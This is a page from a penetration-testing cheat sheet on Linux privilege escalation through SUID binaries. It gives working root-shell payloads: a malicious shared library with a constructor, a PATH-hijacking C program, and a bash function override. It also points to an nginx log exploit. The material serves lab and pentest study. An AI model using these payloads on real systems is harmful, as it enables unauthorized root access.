coffeetohack
  • Introduction
  • Methodology
  • Cheatsheet
    • Ports
    • Nmap
    • Directory Bruteforce
    • Password Cracking
    • Web Server
    • Shells
    • TTY Shells
    • File Transfers
    • XSS | SQLi
    • LFI / RFI
    • File Uploads
    • Port Forwarding
  • Framework/Application
    • CMS Made Simple
    • Blundit
    • Wordpress
    • OctoberCMS
    • Tomcat
  • Windows PrivEsc
    • Scheduled Tasks
    • Stored Passwords
    • Installed Apps
    • Unquoted Service Path
    • Binary Paths
    • DLL Hijacking
    • Startup Apps
    • Executable Files
    • Registry
    • Run As
  • Linux PrivEsc
    • Sudo
    • SUID
    • Capabilities
    • Scheduled Tasks
    • NFS Root Squashing
    • Docker
  • Buffer Overflow
    • dostackbufferoverflow
    • BoF 1
    • Vulnserver
    • Brainpan
    • Brainstorm
  • Initial Shell Exploits
  • PrivEsc Exploits
  • Cisco Packet Tracer
  • Active Directory
    • Methodology
    • LLMNR Poisioning
    • Cracking Hashes
    • SMB Relay
    • IPv6 Attacks
    • PowerView
    • Bloodhound
    • Pass The Hash
    • Token Impersonation
    • Kerberoasting
    • GPP Attack
    • URL File Attack
    • PrintNightmare
    • Mimikatz
    • Golden Ticket Attack
  • OSINT
Powered by GitBook
On this page
  • SHARED OBJECT INJECTION:
  • BINARY SYMLINKS: nginxed-root.sh
  • ENVIRONMENT VARIABLES:

Was this helpful?

  1. Linux PrivEsc

SUID

PreviousSudoNextCapabilities

Last updated 4 years ago

Was this helpful?

Identify a non-common service

Use GTFO bins:

SHARED OBJECT INJECTION:

These files have a .so extension. They are mostly located in /lib/ or /usr/lib/. These are similar to DLL files in Windows. You will need to run non-common programs from SUID output to check if they have those files

Run the program and check what its doing. If you don't find much info then run strace. This will trace you through the whole application. Use another tool called strings to output only human readable strings. Check if there is any error called "No such file or directory". Grep through the output grep -i -E "open|access|no such file"

Then replace one of the files with malicious file.

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p ");
}

Make directory: mkdir /home/user/.config

Compile the program: gcc -shared -fPIC -o /home/user/.config/libcalc.so libcalc.c"

Run the program again to get root

BINARY SYMLINKS: nginxed-root.sh

This is a vuln in Nginx. The flaw is in the permissions of the logs created by nginx. Users can escalate from www-data to root. You might find this through LES. Check the version using: dpkg -l | grep nginx

This exploit takes advantage of SUID bit set to sudo. The log files are pressent at /var/log/nginx

We need to simulate a restart for the exploit to succeed. Run the exploit

ENVIRONMENT VARIABLES:

WITHOUT FULL PATH-

Check if any program is calling a command without the full path. You can exploit this command by creating a malicious file with the same name as that of the command and add it in Env variables.

echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/command.c
#Compile the exploit
gcc /tmp/command.c -o /tmp/command
export PATH=/tmp:$PATH
print $PATH
#Run the SUID program

WITH FULL PATH-

If the program is calling the command with full path then you can try to exploit the function.

function /usr/sbin/service() { cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/bin/service
#Run the SUID program
/usr/local/bin/suid-env2

https://gtfobins.github.io/